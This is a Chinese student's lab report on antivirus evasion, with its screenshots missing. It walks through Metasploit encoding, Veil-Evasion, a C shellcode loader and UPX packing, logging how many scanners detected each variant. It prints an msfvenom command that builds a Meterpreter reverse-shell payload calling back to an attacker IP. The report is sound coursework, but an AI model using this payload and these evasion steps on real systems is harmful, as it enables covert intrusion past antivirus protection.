20155209 林虹宇 Exp3 免杀原理与实践

时间:2021-10-18 18:50:33

Exp3 免杀原理与实践

使用msf生成后门程序的检测

  • 将上周msf生成的后门文件放在virscan.org中进行扫描
    20155209 林虹宇 Exp3 免杀原理与实践

  • 结果很危险
    20155209 林虹宇 Exp3 免杀原理与实践
  • 使用msf编码一次进行扫描
    20155209 林虹宇 Exp3 免杀原理与实践

  • 使用msf编码10次进行扫描
    20155209 林虹宇 Exp3 免杀原理与实践

  • 结果同样很危险,所以单纯改变编码次数并不能免杀。
    20155209 林虹宇 Exp3 免杀原理与实践

使用veil-evasion生成

  • 下载安装完成veil-evasion
    20155209 林虹宇 Exp3 免杀原理与实践

  • 设置生成免杀文件
    20155209 林虹宇 Exp3 免杀原理与实践

  • 生成成功
    20155209 林虹宇 Exp3 免杀原理与实践

  • 开启监听
    20155209 林虹宇 Exp3 免杀原理与实践
    20155209 林虹宇 Exp3 免杀原理与实践
  • 回连成功
    20155209 林虹宇 Exp3 免杀原理与实践

  • av测试警告,只剩5个了很不错
    20155209 林虹宇 Exp3 免杀原理与实践

使用shellcode编写程序

  • 这个步骤我做了好多次,因为虚拟机ip总在变化,变化一次就要重新生成一次shellcode数组,所以以下截图中ip不同常在。
  • 首先执行命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=443 -f c 生成shellcode数组。
    20155209 林虹宇 Exp3 免杀原理与实践

  • 根据这个shellcode数组写出c程序,然后编译c程序生成可在64位windows执行的程序。
    20155209 林虹宇 Exp3 免杀原理与实践

  • 将这个可执行的程序拷到windows中。然后在win中运行,kali中监听。但是不好使。
    20155209 林虹宇 Exp3 免杀原理与实践

  • 只能在win中下载vs,然后用vs编译生成那个shellcode程序。
    20155209 林虹宇 Exp3 免杀原理与实践

  • 生成好了文件,在kali下设置监听
    20155209 林虹宇 Exp3 免杀原理与实践

  • 运行文件,获得回连
    20155209 林虹宇 Exp3 免杀原理与实践

  • av查杀警告5个,也不错
    20155209 林虹宇 Exp3 免杀原理与实践

  • 特意看了一下360,没有用hahaha
    20155209 林虹宇 Exp3 免杀原理与实践

给shellcode加壳

  • 使用upx命令加壳
    20155209 林虹宇 Exp3 免杀原理与实践

  • 将加壳程序拷到win中,然后跟之前一样,监听,运行加壳程序。回连成功。
    20155209 林虹宇 Exp3 免杀原理与实践

  • av查杀警告7个,这壳白加了,要是想用它搞事情就不能用这个了。
    20155209 林虹宇 Exp3 免杀原理与实践

  • 但是看了一下360,还是没查出来。
    20155209 林虹宇 Exp3 免杀原理与实践

  • 由于都是用虚拟机做的,之前的win上没有安装杀毒软件,然后安装杀毒软件,重新做了次回连。
    20155209 林虹宇 Exp3 免杀原理与实践

  • 又用360扫描了一下,只有之前没做免杀的后门被扫了出来
    20155209 林虹宇 Exp3 免杀原理与实践

基础问题回答

  • 杀软是如何检测出恶意代码的?
  • 基于特征码的检测、启发式恶意软件检测、基于行为的恶意软件检测;网上答案跟老师讲的差不多
    20155209 林虹宇 Exp3 免杀原理与实践

  • 免杀是做什么?
  • 不让杀毒软件查出来。
  • 免杀的基本方法有哪些?
  • 改变特征码、改变行为;参考免杀百度百科“免杀”(跟老师讲的差不多)